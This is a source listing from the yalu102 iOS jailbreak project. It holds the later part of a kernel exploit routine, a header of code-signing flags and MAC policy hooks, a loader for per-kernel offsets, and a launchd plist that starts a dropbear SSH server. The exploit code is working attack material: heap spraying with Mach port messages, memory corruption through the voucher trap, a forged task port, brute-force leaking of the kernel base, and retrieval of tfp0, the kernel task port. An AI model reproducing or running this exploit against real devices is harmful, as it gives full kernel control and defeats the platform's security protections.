sizeof(mach_port_t)); 179 | for (int i = 0; i < 0x1000; i++) { 180 | buffer[i] = MACH_PORT_DEAD; 
181 | } 182 | 183 | for (int i = 0; i < 256; i++) { 184 | msg1.desc[i].address = buffer; 185 | msg1.desc[i].count = 0x100/8; 186 | msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 187 | msg1.desc[i].disposition = 19; 188 | } 189 | 190 | pthread_yield_np(); 191 | for (int i=1; i<300; i++) { 192 | msg1.head.msgh_remote_port = ports[i]; 193 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 194 | assert(kret==0); 195 | } 196 | 197 | pthread_yield_np(); 198 | for (int i=500; i<800; i++) { 199 | msg1.head.msgh_remote_port = ports[i]; 200 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 201 | assert(kret==0); 202 | } 203 | 204 | pthread_yield_np(); 205 | for (int i=300; i<500; i++) { 206 | msg1.head.msgh_remote_port = ports[i]; 207 | if (i%4 == 0) { 208 | msg1.msgh_body.msgh_descriptor_count = 1; 209 | } else { 210 | msg1.msgh_body.msgh_descriptor_count = 256; 211 | } 212 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 213 | assert(kret==0); 214 | } 215 | 216 | pthread_yield_np(); 217 | for (int i = 300; i<500; i+=4) { 218 | msg2.head.msgh_local_port = ports[i]; 219 | kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 220 | if(!(i < 380)) 221 | ports[i] = 0; 222 | assert(kret==0); 223 | } 224 | for (int i = 300; i<380; i+=4) { 225 | msg1.head.msgh_remote_port = ports[i]; 226 | msg1.msgh_body.msgh_descriptor_count = 1; 227 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 228 | assert(kret==0); 229 | } 230 | 231 | mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); 232 | mach_port_t foundport = 0; 233 | for (int i=1; i<500; i++) { 234 | if (ports[i]) { 235 | msg1.head.msgh_local_port = ports[i]; 236 | pthread_yield_np(); 237 | kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 238 | 
assert(kret==0); 239 | for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { 240 | mach_port_t* ptz = msg1.desc[k].address; 241 | for (int z = 0; z < 0x100/8; z++) { 242 | if (ptz[z] != MACH_PORT_DEAD) { 243 | if (ptz[z]) { 244 | foundport = ptz[z]; 245 | goto foundp; 246 | } 247 | 248 | } 249 | } 250 | } 251 | mach_msg_destroy(&msg1.head); 252 | mach_port_deallocate(mach_task_self(), ports[i]); 253 | ports[i] = 0; 254 | } 255 | } 256 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 257 | return; 258 | 259 | foundp: 260 | NSLog(@"found corruption %x", foundport); 261 | 262 | uint64_t textbase = 0xfffffff007004000; 263 | 264 | for (int i = 0; i < 0x300; i++) { 265 | for (int k = 0; k < 0x40000; k+=8) { 266 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; 267 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 268 | 269 | kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); 270 | 271 | if (kret != KERN_FAILURE) { 272 | goto gotclock; 273 | } 274 | } 275 | } 276 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 277 | return; 278 | 279 | gotclock:; 280 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 281 | 282 | leaked_ptr &= ~0x3FFF; 283 | 284 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 285 | fakeport->io_references = 0xff; 286 | char* faketask = ((char*)fakeport) + 0x1000; 287 | 288 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 289 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 290 | *(uint64_t*) (faketask + 0x10) = 0xee; 291 | 292 | while (1) { 293 | int32_t leaked = 0; 294 | *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; 295 | pid_for_task(foundport, &leaked); 296 | if (leaked == MH_MAGIC_64) { 297 | NSLog(@"found kernel text at %llx", leaked_ptr); 298 | break; 299 | } 300 | leaked_ptr -= 0x4000; 301 | } 302 | 303 | uint64_t kernel_base = leaked_ptr; 304 | 305 | uint64_t allproc = allproc_offset + kernel_base; 306 | 307 | uint64_t 
proc_ = allproc; 308 | 309 | uint64_t myproc = 0; 310 | uint64_t kernproc = 0; 311 | 312 | while (proc_) { 313 | uint64_t proc = 0; 314 | 315 | *(uint64_t*) (faketask + procoff) = proc_ - 0x10; 316 | pid_for_task(foundport, (int32_t*)&proc); 317 | *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; 318 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); 319 | 320 | int pd = 0; 321 | *(uint64_t*) (faketask + procoff) = proc; 322 | pid_for_task(foundport, &pd); 323 | 324 | if (pd == getpid()) { 325 | myproc = proc; 326 | } else if (pd == 0){ 327 | kernproc = proc; 328 | } 329 | proc_ = proc; 330 | } 331 | 332 | 333 | uint64_t kern_task = 0; 334 | *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; 335 | pid_for_task(foundport, (int32_t*)&kern_task); 336 | *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; 337 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); 338 | 339 | uint64_t itk_kern_sself = 0; 340 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; 341 | pid_for_task(foundport, (int32_t*)&itk_kern_sself); 342 | *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; 343 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 344 | 345 | char* faketaskport = malloc(0x1000); 346 | char* ktaskdump = malloc(0x1000); 347 | 348 | for (int i = 0; i < 0x1000/4; i++) { 349 | *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; 350 | pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); 351 | } 352 | for (int i = 0; i < 0x1000/4; i++) { 353 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; 354 | pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); 355 | } 356 | 357 | memcpy(fakeport, faketaskport, 0x1000); 358 | memcpy(faketask, ktaskdump, 0x1000); 359 | 360 | mach_port_t pt = 0; 361 | 362 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 363 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 364 | 365 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) 
= itk_kern_sself; 366 | 367 | task_get_special_port(foundport, 4, &pt); // get tfp0 368 | NSLog(@"got tfp0 -> %x", pt); 369 | fakeport->io_bits = 0; 370 | 371 | extern uint64_t slide; 372 | slide = kernel_base - 0xFFFFFFF007004000; 373 | 374 | void exploit(void*, mach_port_t, uint64_t, uint64_t); 375 | exploit(sender, pt, kernel_base, allproc_offset); 376 | [dope setEnabled:NO]; 377 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 378 | 379 | } 380 | 381 | - (void)didReceiveMemoryWarning { 382 | [super didReceiveMemoryWarning]; 383 | // Dispose of any resources that can be recreated. 384 | } 385 | 386 | 387 | @end 388 | -------------------------------------------------------------------------------- /yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /yalu102/devicesupport.h: -------------------------------------------------------------------------------- 1 | #ifndef devicesupport_h 2 | #define devicesupport_h 3 | 4 | 5 | 6 | //0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) 7 | 8 | #define G(type) constget(type) 9 | #define S(type, val) constset(type,val) 10 | 11 | #define CS_VALID 0x0000001 /* dynamically valid */ 12 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 13 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 14 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 15 | 16 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 17 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 18 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 19 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 20 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 21 | #define CS_REQUIRE_LV 0x0002000 /* 
require library validation */ 22 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 23 | 24 | #define CS_ALLOWED_MACHO 0x00ffffe 25 | 26 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 27 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 28 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 29 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 30 | 31 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 32 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 33 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 34 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 35 | 36 | uint64_t constget(int idx); 37 | #import 38 | struct mac_policy_ops{ 39 | uint64_t mpo_audit_check_postselect; 40 | uint64_t mpo_audit_check_preselect; 41 | uint64_t mpo_bpfdesc_label_associate; 42 | uint64_t mpo_bpfdesc_label_destroy; 43 | uint64_t mpo_bpfdesc_label_init; 44 | uint64_t mpo_bpfdesc_check_receive; 45 | uint64_t mpo_cred_check_label_update_execve; 46 | uint64_t mpo_cred_check_label_update; 47 | uint64_t mpo_cred_check_visible; 48 | uint64_t mpo_cred_label_associate_fork; 49 | uint64_t mpo_cred_label_associate_kernel; 50 | uint64_t mpo_cred_label_associate; 51 | uint64_t mpo_cred_label_associate_user; 52 | uint64_t mpo_cred_label_destroy; 53 | uint64_t mpo_cred_label_externalize_audit; 54 | uint64_t mpo_cred_label_externalize; 55 | uint64_t mpo_cred_label_init; 56 | uint64_t mpo_cred_label_internalize; 57 | uint64_t mpo_cred_label_update_execve; 58 | uint64_t mpo_cred_label_update; 59 | uint64_t mpo_devfs_label_associate_device; 60 | uint64_t mpo_devfs_label_associate_directory; 61 | uint64_t mpo_devfs_label_copy; 62 | uint64_t mpo_devfs_label_destroy; 63 | uint64_t mpo_devfs_label_init; 64 | uint64_t mpo_devfs_label_update; 65 | uint64_t 
mpo_file_check_change_offset; 66 | uint64_t mpo_file_check_create; 67 | uint64_t mpo_file_check_dup; 68 | uint64_t mpo_file_check_fcntl; 69 | uint64_t mpo_file_check_get_offset; 70 | uint64_t mpo_file_check_get; 71 | uint64_t mpo_file_check_inherit; 72 | uint64_t mpo_file_check_ioctl; 73 | uint64_t mpo_file_check_lock; 74 | uint64_t mpo_file_check_mmap_downgrade; 75 | uint64_t mpo_file_check_mmap; 76 | uint64_t mpo_file_check_receive; 77 | uint64_t mpo_file_check_set; 78 | uint64_t mpo_file_label_init; 79 | uint64_t mpo_file_label_destroy; 80 | uint64_t mpo_file_label_associate; 81 | uint64_t mpo_ifnet_check_label_update; 82 | uint64_t mpo_ifnet_check_transmit; 83 | uint64_t mpo_ifnet_label_associate; 84 | uint64_t mpo_ifnet_label_copy; 85 | uint64_t mpo_ifnet_label_destroy; 86 | uint64_t mpo_ifnet_label_externalize; 87 | uint64_t mpo_ifnet_label_init; 88 | uint64_t mpo_ifnet_label_internalize; 89 | uint64_t mpo_ifnet_label_update; 90 | uint64_t mpo_ifnet_label_recycle; 91 | uint64_t mpo_inpcb_check_deliver; 92 | uint64_t mpo_inpcb_label_associate; 93 | uint64_t mpo_inpcb_label_destroy; 94 | uint64_t mpo_inpcb_label_init; 95 | uint64_t mpo_inpcb_label_recycle; 96 | uint64_t mpo_inpcb_label_update; 97 | uint64_t mpo_iokit_check_device; 98 | uint64_t mpo_ipq_label_associate; 99 | uint64_t mpo_ipq_label_compare; 100 | uint64_t mpo_ipq_label_destroy; 101 | uint64_t mpo_ipq_label_init; 102 | uint64_t mpo_ipq_label_update; 103 | uint64_t mpo_file_check_library_validation; 104 | uint64_t mpo_vnode_notify_setacl; 105 | uint64_t mpo_vnode_notify_setattrlist; 106 | uint64_t mpo_vnode_notify_setextattr; 107 | uint64_t mpo_vnode_notify_setflags; 108 | uint64_t mpo_vnode_notify_setmode; 109 | uint64_t mpo_vnode_notify_setowner; 110 | uint64_t mpo_vnode_notify_setutimes; 111 | uint64_t mpo_vnode_notify_truncate; 112 | uint64_t mpo_mbuf_label_associate_bpfdesc; 113 | uint64_t mpo_mbuf_label_associate_ifnet; 114 | uint64_t mpo_mbuf_label_associate_inpcb; 115 | uint64_t 
mpo_mbuf_label_associate_ipq; 116 | uint64_t mpo_mbuf_label_associate_linklayer; 117 | uint64_t mpo_mbuf_label_associate_multicast_encap; 118 | uint64_t mpo_mbuf_label_associate_netlayer; 119 | uint64_t mpo_mbuf_label_associate_socket; 120 | uint64_t mpo_mbuf_label_copy; 121 | uint64_t mpo_mbuf_label_destroy; 122 | uint64_t mpo_mbuf_label_init; 123 | uint64_t mpo_mount_check_fsctl; 124 | uint64_t mpo_mount_check_getattr; 125 | uint64_t mpo_mount_check_label_update; 126 | uint64_t mpo_mount_check_mount; 127 | uint64_t mpo_mount_check_remount; 128 | uint64_t mpo_mount_check_setattr; 129 | uint64_t mpo_mount_check_stat; 130 | uint64_t mpo_mount_check_umount; 131 | uint64_t mpo_mount_label_associate; 132 | uint64_t mpo_mount_label_destroy; 133 | uint64_t mpo_mount_label_externalize; 134 | uint64_t mpo_mount_label_init; 135 | uint64_t mpo_mount_label_internalize; 136 | uint64_t mpo_netinet_fragment; 137 | uint64_t mpo_netinet_icmp_reply; 138 | uint64_t mpo_netinet_tcp_reply; 139 | uint64_t mpo_pipe_check_ioctl; 140 | uint64_t mpo_pipe_check_kqfilter; 141 | uint64_t mpo_pipe_check_label_update; 142 | uint64_t mpo_pipe_check_read; 143 | uint64_t mpo_pipe_check_select; 144 | uint64_t mpo_pipe_check_stat; 145 | uint64_t mpo_pipe_check_write; 146 | uint64_t mpo_pipe_label_associate; 147 | uint64_t mpo_pipe_label_copy; 148 | uint64_t mpo_pipe_label_destroy; 149 | uint64_t mpo_pipe_label_externalize; 150 | uint64_t mpo_pipe_label_init; 151 | uint64_t mpo_pipe_label_internalize; 152 | uint64_t mpo_pipe_label_update; 153 | uint64_t mpo_policy_destroy; 154 | uint64_t mpo_policy_init; 155 | uint64_t mpo_policy_initbsd; 156 | uint64_t mpo_policy_syscall; 157 | uint64_t mpo_system_check_sysctlbyname; 158 | uint64_t mpo_proc_check_inherit_ipc_ports; 159 | uint64_t mpo_vnode_check_rename; 160 | uint64_t mpo_kext_check_query; 161 | uint64_t mpo_iokit_check_nvram_get; 162 | uint64_t mpo_iokit_check_nvram_set; 163 | uint64_t mpo_iokit_check_nvram_delete; 164 | uint64_t 
mpo_proc_check_expose_task; 165 | uint64_t mpo_proc_check_set_host_special_port; 166 | uint64_t mpo_proc_check_set_host_exception_port; 167 | uint64_t mpo_exc_action_check_exception_send; 168 | uint64_t mpo_exc_action_label_associate; 169 | uint64_t mpo_exc_action_label_copy; 170 | uint64_t mpo_exc_action_label_destroy; 171 | uint64_t mpo_exc_action_label_init; 172 | uint64_t mpo_exc_action_label_update; 173 | uint64_t mpo_reserved1; 174 | uint64_t mpo_reserved2; 175 | uint64_t mpo_reserved3; 176 | uint64_t mpo_reserved4; 177 | uint64_t mpo_reserved5; 178 | uint64_t mpo_reserved6; 179 | uint64_t mpo_posixsem_check_create; 180 | uint64_t mpo_posixsem_check_open; 181 | uint64_t mpo_posixsem_check_post; 182 | uint64_t mpo_posixsem_check_unlink; 183 | uint64_t mpo_posixsem_check_wait; 184 | uint64_t mpo_posixsem_label_associate; 185 | uint64_t mpo_posixsem_label_destroy; 186 | uint64_t mpo_posixsem_label_init; 187 | uint64_t mpo_posixshm_check_create; 188 | uint64_t mpo_posixshm_check_mmap; 189 | uint64_t mpo_posixshm_check_open; 190 | uint64_t mpo_posixshm_check_stat; 191 | uint64_t mpo_posixshm_check_truncate; 192 | uint64_t mpo_posixshm_check_unlink; 193 | uint64_t mpo_posixshm_label_associate; 194 | uint64_t mpo_posixshm_label_destroy; 195 | uint64_t mpo_posixshm_label_init; 196 | uint64_t mpo_proc_check_debug; 197 | uint64_t mpo_proc_check_fork; 198 | uint64_t mpo_proc_check_get_task_name; 199 | uint64_t mpo_proc_check_get_task; 200 | uint64_t mpo_proc_check_getaudit; 201 | uint64_t mpo_proc_check_getauid; 202 | uint64_t mpo_proc_check_getlcid; 203 | uint64_t mpo_proc_check_mprotect; 204 | uint64_t mpo_proc_check_sched; 205 | uint64_t mpo_proc_check_setaudit; 206 | uint64_t mpo_proc_check_setauid; 207 | uint64_t mpo_proc_check_setlcid; 208 | uint64_t mpo_proc_check_signal; 209 | uint64_t mpo_proc_check_wait; 210 | uint64_t mpo_proc_label_destroy; 211 | uint64_t mpo_proc_label_init; 212 | uint64_t mpo_socket_check_accept; 213 | uint64_t mpo_socket_check_accepted; 
214 | uint64_t mpo_socket_check_bind; 215 | uint64_t mpo_socket_check_connect; 216 | uint64_t mpo_socket_check_create; 217 | uint64_t mpo_socket_check_deliver; 218 | uint64_t mpo_socket_check_kqfilter; 219 | uint64_t mpo_socket_check_label_update; 220 | uint64_t mpo_socket_check_listen; 221 | uint64_t mpo_socket_check_receive; 222 | uint64_t mpo_socket_check_received; 223 | uint64_t mpo_socket_check_select; 224 | uint64_t mpo_socket_check_send; 225 | uint64_t mpo_socket_check_stat; 226 | uint64_t mpo_socket_check_setsockopt; 227 | uint64_t mpo_socket_check_getsockopt; 228 | uint64_t mpo_socket_label_associate_accept; 229 | uint64_t mpo_socket_label_associate; 230 | uint64_t mpo_socket_label_copy; 231 | uint64_t mpo_socket_label_destroy; 232 | uint64_t mpo_socket_label_externalize; 233 | uint64_t mpo_socket_label_init; 234 | uint64_t mpo_socket_label_internalize; 235 | uint64_t mpo_socket_label_update; 236 | uint64_t mpo_socketpeer_label_associate_mbuf; 237 | uint64_t mpo_socketpeer_label_associate_socket; 238 | uint64_t mpo_socketpeer_label_destroy; 239 | uint64_t mpo_socketpeer_label_externalize; 240 | uint64_t mpo_socketpeer_label_init; 241 | uint64_t mpo_system_check_acct; 242 | uint64_t mpo_system_check_audit; 243 | uint64_t mpo_system_check_auditctl; 244 | uint64_t mpo_system_check_auditon; 245 | uint64_t mpo_system_check_host_priv; 246 | uint64_t mpo_system_check_nfsd; 247 | uint64_t mpo_system_check_reboot; 248 | uint64_t mpo_system_check_settime; 249 | uint64_t mpo_system_check_swapoff; 250 | uint64_t mpo_system_check_swapon; 251 | uint64_t mpo_reserved7; 252 | uint64_t mpo_sysvmsg_label_associate; 253 | uint64_t mpo_sysvmsg_label_destroy; 254 | uint64_t mpo_sysvmsg_label_init; 255 | uint64_t mpo_sysvmsg_label_recycle; 256 | uint64_t mpo_sysvmsq_check_enqueue; 257 | uint64_t mpo_sysvmsq_check_msgrcv; 258 | uint64_t mpo_sysvmsq_check_msgrmid; 259 | uint64_t mpo_sysvmsq_check_msqctl; 260 | uint64_t mpo_sysvmsq_check_msqget; 261 | uint64_t 
mpo_sysvmsq_check_msqrcv; 262 | uint64_t mpo_sysvmsq_check_msqsnd; 263 | uint64_t mpo_sysvmsq_label_associate; 264 | uint64_t mpo_sysvmsq_label_destroy; 265 | uint64_t mpo_sysvmsq_label_init; 266 | uint64_t mpo_sysvmsq_label_recycle; 267 | uint64_t mpo_sysvsem_check_semctl; 268 | uint64_t mpo_sysvsem_check_semget; 269 | uint64_t mpo_sysvsem_check_semop; 270 | uint64_t mpo_sysvsem_label_associate; 271 | uint64_t mpo_sysvsem_label_destroy; 272 | uint64_t mpo_sysvsem_label_init; 273 | uint64_t mpo_sysvsem_label_recycle; 274 | uint64_t mpo_sysvshm_check_shmat; 275 | uint64_t mpo_sysvshm_check_shmctl; 276 | uint64_t mpo_sysvshm_check_shmdt; 277 | uint64_t mpo_sysvshm_check_shmget; 278 | uint64_t mpo_sysvshm_label_associate; 279 | uint64_t mpo_sysvshm_label_destroy; 280 | uint64_t mpo_sysvshm_label_init; 281 | uint64_t mpo_sysvshm_label_recycle; 282 | uint64_t mpo_reserved8; 283 | uint64_t mpo_reserved9; 284 | uint64_t mpo_vnode_check_getattr; 285 | uint64_t mpo_mount_check_snapshot_create; 286 | uint64_t mpo_mount_check_snapshot_delete; 287 | uint64_t mpo_vnode_check_clone; 288 | uint64_t mpo_proc_check_get_cs_info; 289 | uint64_t mpo_proc_check_set_cs_info; 290 | uint64_t mpo_iokit_check_hid_control; 291 | uint64_t mpo_vnode_check_access; 292 | uint64_t mpo_vnode_check_chdir; 293 | uint64_t mpo_vnode_check_chroot; 294 | uint64_t mpo_vnode_check_create; 295 | uint64_t mpo_vnode_check_deleteextattr; 296 | uint64_t mpo_vnode_check_exchangedata; 297 | uint64_t mpo_vnode_check_exec; 298 | uint64_t mpo_vnode_check_getattrlist; 299 | uint64_t mpo_vnode_check_getextattr; 300 | uint64_t mpo_vnode_check_ioctl; 301 | uint64_t mpo_vnode_check_kqfilter; 302 | uint64_t mpo_vnode_check_label_update; 303 | uint64_t mpo_vnode_check_link; 304 | uint64_t mpo_vnode_check_listextattr; 305 | uint64_t mpo_vnode_check_lookup; 306 | uint64_t mpo_vnode_check_open; 307 | uint64_t mpo_vnode_check_read; 308 | uint64_t mpo_vnode_check_readdir; 309 | uint64_t mpo_vnode_check_readlink; 310 | uint64_t 
mpo_vnode_check_rename_from; 311 | uint64_t mpo_vnode_check_rename_to; 312 | uint64_t mpo_vnode_check_revoke; 313 | uint64_t mpo_vnode_check_select; 314 | uint64_t mpo_vnode_check_setattrlist; 315 | uint64_t mpo_vnode_check_setextattr; 316 | uint64_t mpo_vnode_check_setflags; 317 | uint64_t mpo_vnode_check_setmode; 318 | uint64_t mpo_vnode_check_setowner; 319 | uint64_t mpo_vnode_check_setutimes; 320 | uint64_t mpo_vnode_check_stat; 321 | uint64_t mpo_vnode_check_truncate; 322 | uint64_t mpo_vnode_check_unlink; 323 | uint64_t mpo_vnode_check_write; 324 | uint64_t mpo_vnode_label_associate_devfs; 325 | uint64_t mpo_vnode_label_associate_extattr; 326 | uint64_t mpo_vnode_label_associate_file; 327 | uint64_t mpo_vnode_label_associate_pipe; 328 | uint64_t mpo_vnode_label_associate_posixsem; 329 | uint64_t mpo_vnode_label_associate_posixshm; 330 | uint64_t mpo_vnode_label_associate_singlelabel; 331 | uint64_t mpo_vnode_label_associate_socket; 332 | uint64_t mpo_vnode_label_copy; 333 | uint64_t mpo_vnode_label_destroy; 334 | uint64_t mpo_vnode_label_externalize_audit; 335 | uint64_t mpo_vnode_label_externalize; 336 | uint64_t mpo_vnode_label_init; 337 | uint64_t mpo_vnode_label_internalize; 338 | uint64_t mpo_vnode_label_recycle; 339 | uint64_t mpo_vnode_label_store; 340 | uint64_t mpo_vnode_label_update_extattr; 341 | uint64_t mpo_vnode_label_update; 342 | uint64_t mpo_vnode_notify_create; 343 | uint64_t mpo_vnode_check_signature; 344 | uint64_t mpo_vnode_check_uipc_bind; 345 | uint64_t mpo_vnode_check_uipc_connect; 346 | uint64_t mpo_proc_check_run_cs_invalid; 347 | uint64_t mpo_proc_check_suspend_resume; 348 | uint64_t mpo_thread_userret; 349 | uint64_t mpo_iokit_check_set_properties; 350 | uint64_t mpo_system_check_chud; 351 | uint64_t mpo_vnode_check_searchfs; 352 | uint64_t mpo_priv_check; 353 | uint64_t mpo_priv_grant; 354 | uint64_t mpo_proc_check_map_anon; 355 | uint64_t mpo_vnode_check_fsgetpath; 356 | uint64_t mpo_iokit_check_open; 357 | uint64_t 
mpo_proc_check_ledger;
358 |     uint64_t mpo_vnode_notify_rename;
359 |     uint64_t mpo_vnode_check_setacl;
360 |     uint64_t mpo_vnode_notify_deleteextattr;
361 |     uint64_t mpo_system_check_kas_info;
362 |     uint64_t mpo_proc_check_cpumon;
363 |     uint64_t mpo_vnode_notify_open;
364 |     uint64_t mpo_system_check_info;
365 |     uint64_t mpo_pty_notify_grant;
366 |     uint64_t mpo_pty_notify_close;
367 |     uint64_t mpo_vnode_find_sigs;
368 |     uint64_t mpo_kext_check_load;
369 |     uint64_t mpo_kext_check_unload;
370 |     uint64_t mpo_proc_check_proc_info;
371 |     uint64_t mpo_vnode_notify_link;
372 |     uint64_t mpo_iokit_check_filter_properties;
373 |     uint64_t mpo_iokit_check_get_property;
374 | };
375 |
376 |
377 |
378 | #endif /* devicesupport_h */
379 |
--------------------------------------------------------------------------------
/yalu102/devicesupport.m:
--------------------------------------------------------------------------------
1 | #import
2 | #import "devicesupport.h"
3 | #import
4 | #import
5 |
6 |
// consttable: the table chosen by affine_const_by_surfacevt(); stays nil until a match is found.
7 | NSMutableArray* consttable = nil;
// collide: every def.plist table whose "vers" equals the running kernel's version string.
8 | NSMutableArray* collide = nil;
/*
 * Loads the constant tables for the running kernel from def.plist in the
 * main bundle.
 *
 * The plist is read as an array of dictionaries. Each dictionary whose
 * "vers" string equals uname()'s version string contributes one table:
 * its "val" strings are parsed with strtoull (base 0, so the prefix picks
 * the radix) and stored, in order, in a new array appended to `collide`.
 *
 * Returns 0 when at least one dictionary matched, -1 when none did, and
 * -2 when the version string contains "Marijuan".
 */
9 | int constload() {
10 |     struct utsname uts;
// The return value of uname() is not checked.
11 |     uname(&uts);
// jailbreak.m in this listing overwrites the kernel's "RELEASE_ARM" text with
// "MarijuanARM", so this test presumably detects a kernel that was already
// patched. The same string in the reported kernel version is a visible sign
// that a device has been modified by this tool.
12 |     if (strstr(uts.version, "Marijuan")) {
13 |         return -2;
14 |     }
15 |
16 |     NSString* strv = [NSString stringWithUTF8String:uts.version];
17 |     NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]];
// m counts the matching dictionaries and is also the next index in `collide`.
18 |     int m = 0;
19 |     collide = [NSMutableArray new];
20 |
21 |     for (NSDictionary* dict in dp) {
22 |         if ([dict[@"vers"] isEqualToString:strv]) {
23 |             [collide setObject:[NSMutableArray new] atIndexedSubscript:m];
24 |             int i = 0;
25 |             for (NSString* str in dict[@"val"]) {
// strtoull is called without an end pointer, so an unparsable string is stored as 0.
26 |                 [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i];
27 |                 i++;
28 |             }
29 |             m++;
30 |         }
31 |     }
32 |     if (m) {
33 |         return 0;
34 |     }
35 |     return -1;
36 | }
/*
 * Selects the active constant table by comparing an address against each
 * candidate loaded by constload().
 *
 * Only the low 20 bits are compared: those of `surfacevt_slid` against
 * those of element 1 of each table. The first table that matches becomes
 * `consttable`.
 *
 * Returns 0 on a match and -1 (as a char) when no table matches.
 * NOTE(review): element 1 is read without a length check, so a table with
 * fewer than two values raises an NSRangeException here.
 */
37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid)
38 | {
39 |     for (NSArray* arr in collide) {
40 |         if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) {
41 |             NSLog(@"affined");
42 |             consttable = arr;
43 |             return 0;
44 |         }
45 |     }
46 |     return -1;
47 | }
/*
 * Returns entry `idx` of the selected constant table as a uint64_t.
 *
 * While consttable is still nil the message send yields 0; an index past
 * the end of the table raises an NSRangeException. Neither case is
 * checked here.
 */
48 | uint64_t constget(int idx){
49 |     return [[consttable objectAtIndex:idx] unsignedLongLongValue];
50 | }
51 |
--------------------------------------------------------------------------------
/yalu102/dropbear.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | ShaiHulud
7 | Program
8 | /usr/local/bin/dropbear
9 | ProgramArguments
10 |
11 | /usr/local/bin/dropbear
12 | -F
13 | -R
14 | -p
15 | 127.0.0.1:22
16 |
17 | RunAtLoad
18 |
19 | KeepAlive
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/yalu102/iokitmig64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/iokitmig64.o
--------------------------------------------------------------------------------
/yalu102/jailbreak.m:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.m
3 | // yalu102
4 | //
5 | // Created by qwertyoruiop on 07/01/2017.
6 | // Copyright © 2017 kimjongcracks. All rights reserved.
7 | //
8 |
9 | #import
10 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED
11 | #import
12 | #import "devicesupport.h"
13 |
14 | #import
15 | #import
16 | #import
17 | #import
18 | #import
19 | #import
20 |
21 | #import "devicesupport.h"
22 | #import
23 | #import
24 | #import
25 | #import
26 | #import
27 | #import
28 | #import
29 |
30 | #import "patchfinder64.h"
31 |
32 | #define vm_address_t mach_vm_address_t
33 |
